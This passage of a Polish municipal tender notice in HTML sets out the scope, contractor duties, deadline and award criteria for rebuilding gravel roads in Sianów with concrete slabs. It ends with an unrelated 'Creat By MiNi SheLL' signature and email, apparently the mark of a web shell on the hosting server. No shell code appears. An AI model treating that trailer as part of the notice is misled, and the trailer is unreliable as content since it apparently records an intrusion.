8.	W czasie realizacji robót Wykonawca będzie utrzymywać teren budowy w stanie wolnym od przeszkód komunikacyjnych. Istniejące w sąsiedztwie planowanej inwestycji posesje są zamieszkałe. Zobowiązuje się Wykonawcę do organizowania i wykonywania umowy w sposób nie utrudniający dostępu do nieruchomości. Zamawiający nie przewiduje z tego tytułu żadnych dodatkowych zapłat..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.26-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin wykonania - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> SIANÓW - ul. Dębowa (dz. nr 285/1 obr. Skibno i 235, obr. nr 3 m. Sianów)
- nawierzchnia z płyt betonowych typu YOMB C -  szacunkowa długość ~ 100 mb..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający zastrzega sobie obowiązek osobistego wykonania przez Wykonawcę kluczowych części zamówienia na roboty budowlane:
a)	warstwy odsączającej;
b)	warstwy z kruszywa łamanego stabilizowanego mechanicznie 
c)	ułożenia płyt betonowych;
określonych w przekroju konstrukcyjnym stanowiącym załącznik do SIWZ
1)	Przedmiotem zamówienia jest zawarcie umowy na przebudowę dróg gminnych dla poszczególnych zadań, polegający na ułożeniu płyt YOMB. Zakres prac określa przedmiar stanowiący element pomocniczy przy sporządzaniu kosztorysu ofertowego. 
2)	Zamawiający zastrzega sobie prawo do zmniejszenia ilość dróg przeznaczonych do przebudowy. Ograniczenie przedmiotu umowy, nie stanowi niewykonania lub nienależytego wykonania zobowiązania, a w związku z tym nie jest podstawą do podnoszenia jakichkolwiek roszczeń w stosunku do Zamawiającego. 
3)	Potwierdzeniem wykonania robót, będzie protokół odbioru robót podpisany przez strony.
4)	Elementami składowymi przedmiotu zamówienia są wszelkie roboty i usługi towarzyszące realizacji robót, w szczególności: wywóz urobku na odległość  do                2 km., przejazd, transport maszyn, dokumentacja geodezyjna powykonawcza,  odszkodowanie za powstałe szkody podczas robót, itp.  
5)	Odpowiedzialność Wykonawcy z tytułu gwarancji oraz rękojmi na wykonany przedmiot zamówienia wynosi 60 miesięcy.
6)	Wszelkie szkody wynikłe w trakcie realizacji umowy w tym w obrębie sąsiednich terenów stanowiących własność osób fizycznych i prawnych obciążają Wykonawcę.
7)	Wykonawca bierze na siebie pełną odpowiedzialność za właściwe wykonanie robót tj.: zapewnienie warunków bezpieczeństwa osób przebywających na placu budowy i mienia oraz za metody organizacyjno-techniczne.
8)	W czasie realizacji robót Wykonawca będzie utrzymywać teren budowy w stanie wolnym od przeszkód komunikacyjnych. Istniejące w sąsiedztwie planowanej inwestycji posesje są zamieszkałe. Zobowiązuje się Wykonawcę do organizowania i wykonywania umowy w sposób nie utrudniający dostępu do nieruchomości. Zamawiający nie przewiduje z tego tytułu żadnych dodatkowych zapłat..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.26-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin wykonania - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> SKWIERZYNKA  (dz. nr 169/1 obr. Skwierzynka)
- nawierzchnia z płyt betonowych typu YOMB C -  szacunkowa długość ~ 250 mb..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający zastrzega sobie obowiązek osobistego wykonania przez Wykonawcę kluczowych części zamówienia na roboty budowlane:
a)	warstwy odsączającej;
b)	warstwy z kruszywa łamanego stabilizowanego mechanicznie 
c)	ułożenia płyt betonowych;
określonych w przekroju konstrukcyjnym stanowiącym załącznik do SIWZ
1)	Przedmiotem zamówienia jest zawarcie umowy na przebudowę dróg gminnych dla poszczególnych zadań, polegający na ułożeniu płyt YOMB. Zakres prac określa przedmiar stanowiący element pomocniczy przy sporządzaniu kosztorysu ofertowego. 
2)	Zamawiający zastrzega sobie prawo do zmniejszenia ilość dróg przeznaczonych do przebudowy. Ograniczenie przedmiotu umowy, nie stanowi niewykonania lub nienależytego wykonania zobowiązania, a w związku z tym nie jest podstawą do podnoszenia jakichkolwiek roszczeń w stosunku do Zamawiającego. 
3)	Potwierdzeniem wykonania robót, będzie protokół odbioru robót podpisany przez strony.
4)	Elementami składowymi przedmiotu zamówienia są wszelkie roboty i usługi towarzyszące realizacji robót, w szczególności: wywóz urobku na odległość  do                2 km., przejazd, transport maszyn, dokumentacja geodezyjna powykonawcza,  odszkodowanie za powstałe szkody podczas robót, itp.  
5)	Odpowiedzialność Wykonawcy z tytułu gwarancji oraz rękojmi na wykonany przedmiot zamówienia wynosi 60 miesięcy.
6)	Wszelkie szkody wynikłe w trakcie realizacji umowy w tym w obrębie sąsiednich terenów stanowiących własność osób fizycznych i prawnych obciążają Wykonawcę.
7) Wykonawca bierze na siebie pełną odpowiedzialność za właściwe wykonanie robót tj.: zapewnienie warunków bezpieczeństwa osób przebywających na placu budowy i mienia oraz za metody organizacyjno-techniczne.
8)	W czasie realizacji robót Wykonawca będzie utrzymywać teren budowy w stanie wolnym od przeszkód komunikacyjnych. Istniejące w sąsiedztwie planowanej inwestycji posesje są zamieszkałe. Zobowiązuje się Wykonawcę do organizowania i wykonywania umowy w sposób nie utrudniający dostępu do nieruchomości. Zamawiający nie przewiduje z tego tytułu żadnych dodatkowych zapłat..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.26-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.06.2016.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com